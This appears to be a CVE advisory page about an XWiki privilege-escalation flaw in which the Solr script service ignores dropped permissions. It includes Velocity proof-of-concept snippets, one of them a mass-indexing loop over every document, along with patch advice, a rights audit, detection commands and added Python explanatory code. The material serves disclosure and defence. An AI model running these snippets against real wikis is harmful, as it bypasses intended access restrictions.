How the CVE Works
The vulnerability sits in XWiki's Solr script service (`$services.solr`), whose indexing operations are meant to require programming right. The check consulted only whether the current script holds programming right and never asked whether that right had been given up with `$xcontext.dropPermissions()`, the call a privileged script makes before evaluating less-trusted content so that any later privileged operation fails. Because the service did not re-check after the drop, Velocity running under dropped permissions could still drive Solr operations such as mass-indexing documents or removing entries from the search index. This lets content from a user holding only script right, evaluated in such a context, bypass the intended restriction. The exploit therefore uses Velocity to drop permissions mid-execution and then call the service.
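As an added illustration (not XWiki code and not from the original post), the following Python model contrasts the check the page describes as vulnerable with the corrected one. The class, function and flag names are hypothetical stand-ins for the state XWiki keeps in its execution context; the point is that a check which only asks "does the author hold programming right" cannot see that the right was dropped.

```python
"""Model of the authorization bug described above.

Added example, not XWiki code. XWiki lets a script that holds programming right
call $xcontext.dropPermissions() before evaluating less-trusted content; every
later privileged call is then supposed to fail. The vulnerable Solr script
service consulted only "does the author hold programming right" and ignored the
dropped flag. All names below are hypothetical.
"""
from dataclasses import dataclass, field


class AccessDenied(Exception):
    """Stand-in for XWiki's AccessDeniedException."""


@dataclass
class ScriptContext:
    # Hypothetical model of the XWiki context: the script author's right, and
    # whether the running script has already called dropPermissions().
    author_has_programming_right: bool
    dropped_permissions: bool = False
    # documents whose (re)indexing was accepted during this execution
    index_queue: list = field(default_factory=list)

    def drop_permissions(self) -> None:
        """Equivalent of $xcontext.dropPermissions()."""
        self.dropped_permissions = True


def check_programming_right_vulnerable(ctx: ScriptContext) -> None:
    # Bug: looks at the author's right only. A script that has already dropped
    # its permissions still passes, because its author still *holds* the right.
    if not ctx.author_has_programming_right:
        raise AccessDenied("programming right required")


def check_programming_right_fixed(ctx: ScriptContext) -> None:
    # Fix: a dropped context is unprivileged no matter who the author is.
    if ctx.dropped_permissions or not ctx.author_has_programming_right:
        raise AccessDenied("programming right required")


def solr_index(ctx: ScriptContext, reference: str,
               check=check_programming_right_fixed) -> bool:
    """Model of $services.solr.index(reference). Returns True when the
    reference was accepted for indexing, False when the check refused it."""
    try:
        check(ctx)
    except AccessDenied:
        return False
    ctx.index_queue.append(reference)
    return True


def run_after_drop(check) -> bool:
    """A privileged script drops its permissions, then content it evaluates
    tries to index a document. Returns whether the indexing was accepted."""
    ctx = ScriptContext(author_has_programming_right=True)
    ctx.drop_permissions()
    return solr_index(ctx, "document:xwiki:Main.WebHome", check)


if __name__ == "__main__":
    print("vulnerable check accepts after drop:",
          run_after_drop(check_programming_right_vulnerable))  # True
    print("fixed check accepts after drop:     ",
          run_after_drop(check_programming_right_fixed))       # False
```

Both checks still refuse a script whose author never held programming right; the difference shows only after `drop_permissions()`, which is exactly the case the fix adds.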
DailyCVE Form:
Platform: XWiki
Version: before 15.10.13, and 16.x before 16.4.4
Vulnerability: Privilege Escalation
Severity: Medium
Date: 2024-XX-XX
What Undercode Says:
Exploitation Analysis
1. Exploit Trigger (Velocity in a page; on an unpatched instance the index call is not refused even though permissions were dropped on the line before it, on a fixed instance it is):
{{velocity}}
$xcontext.dropPermissions()
$services.solr.index('document:xwiki:Main.WebHome')
{{/velocity}}
2. Log Check: on a patched instance the refused call surfaces as an authorization failure; search the XWiki application log (its location depends on the servlet container and packaging) around the time of the test:
grep -i "AccessDenied" /path/to/xwiki.log
3. Mass Indexing Attack (the same trick applied to every document the search returns; $xwiki.searchDocuments yields document full names, so each is resolved to a reference before being handed to the service):
{{velocity}}
$xcontext.dropPermissions()
#foreach($name in $xwiki.searchDocuments(""))
  $services.solr.index($services.model.resolveDocument($name))
#end
{{/velocity}}
Protection Measures
1. Patch Immediately:
Upgrade to 15.10.13 (15.x line) or 16.4.4 (16.x line) or newer, using your deployment's usual channel (WAR from the XWiki download page, distribution packages, or the official Docker image tag).
2. Temporary Mitigation:
The Solr script service has no dedicated kill switch in xwiki.cfg, so reduce exposure instead: grant Script right only to trusted users (Administer Wiki > Users & Rights > Rights), and review any script that calls $xcontext.dropPermissions() before evaluating user-supplied content.
3. Audit Script Rights:
Rights are stored as XWiki.XWikiGlobalRights (wiki/space level) and XWiki.XWikiRights (page level) objects; this XWQL, run from a page by a user with script right, lists documents carrying an allow rule for the script level:
{{velocity}}
#foreach($class in ['XWiki.XWikiGlobalRights', 'XWiki.XWikiRights'])
#set($xwql = "from doc.object(${class}) as r where r.levels like '%script%' and r.allow = 1")
#foreach($name in $services.query.xwql($xwql).execute())
  * $name ($class)
#end
#end
{{/velocity}}
Detection Commands
1. Check Vulnerable Instances (the standard skin prints the running version in the page footer; compare the result against 15.10.13 and 16.4.4):
curl -s http://xwiki-host/xwiki/bin/view/Main/ | grep -o 'XWiki [0-9][0-9.]*'
2. Monitor Solr Activity: with the default embedded Solr (solr.type=embedded in xwiki.properties) indexing runs inside the XWiki JVM and shows up in XWiki's own log; with a remote Solr (solr.type=remote) the /update requests XWiki sends appear in Solr's log:
journalctl -u solr --since "1 hour ago" | grep "/update"
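The version string the detection command above extracts still has to be compared against two fixed releases on two maintenance lines. The following Python, added here and not part of the original page or of XWiki, does that comparison generally: it treats a version as affected when it is older than the oldest fix or when it sits on a maintenance line that received its own fix and predates it. The footer HTML it parses is constructed sample input; the fixed versions are the ones this page lists.

```python
"""Classify an XWiki version string against the fixed releases listed above.

Added example, not part of the page or of XWiki. Assumptions: the affected
ranges are "< 15.10.13" and "16.0.0 <= v < 16.4.4"; pre-release suffixes such
as 16.4.0-rc-1 are read as their base version; anything >= 16.4.4 is fixed.
"""
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Fixed releases from the advisory, one per maintenance line.
FIXED_VERSIONS = ((15, 10, 13), (16, 4, 4))

VERSION_RE = re.compile(r"XWiki\s+(\d+)\.(\d+)\.(\d+)")

# Constructed sample of what the footer grep would see (not captured from a real site).
SAMPLE_FOOTER = (
    '<div id="footerglobal"><p>Powered by '
    '<span id="xwikiplatformversion">XWiki 16.3.2</span></p></div>'
)


def parse_version(text: str) -> Optional[Version]:
    """Return the first 'XWiki X.Y.Z' in page HTML as a tuple, or None."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(g) for g in m.groups())  # type: ignore[return-value]


def is_vulnerable(version: Version, fixes=FIXED_VERSIONS) -> bool:
    """Affected if older than the oldest fix, or on a maintenance line
    (same major) that has its own fix and older than that fix."""
    ordered = sorted(fixes)
    if version < ordered[0]:
        return True
    return any(version[0] == fix[0] and version < fix for fix in ordered)


def classify(page_text: str) -> str:
    """'vulnerable', 'fixed', or 'unknown' when no version is printed."""
    version = parse_version(page_text)
    if version is None:
        return "unknown"
    return "vulnerable" if is_vulnerable(version) else "fixed"


if __name__ == "__main__":
    for sample in ("XWiki 15.10.12", "XWiki 15.10.13", "XWiki 16.3.2",
                   "XWiki 16.4.4", "XWiki 17.0.0"):
        print(sample, "->", classify(sample))
    print("footer ->", classify(SAMPLE_FOOTER))  # vulnerable
```

Pipe the curl output from the detection step into `classify()` and the script answers for both lines at once; a 15.10.14 install is correctly reported as fixed even though it is numerically below 16.4.4.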
Code Fix (Patch Reference)
// Corrected check, illustrative rather than the upstream diff: the call must be
// refused when permissions were dropped OR the caller lacks programming right.
// (The original text had the condition inverted, letting dropped contexts through.)
if (xcontext.hasDroppedPermissions() || !hasProgrammingRights()) {
    throw new PermissionDeniedException();
}
References
Reported by: github.com
Extra source hub: Undercode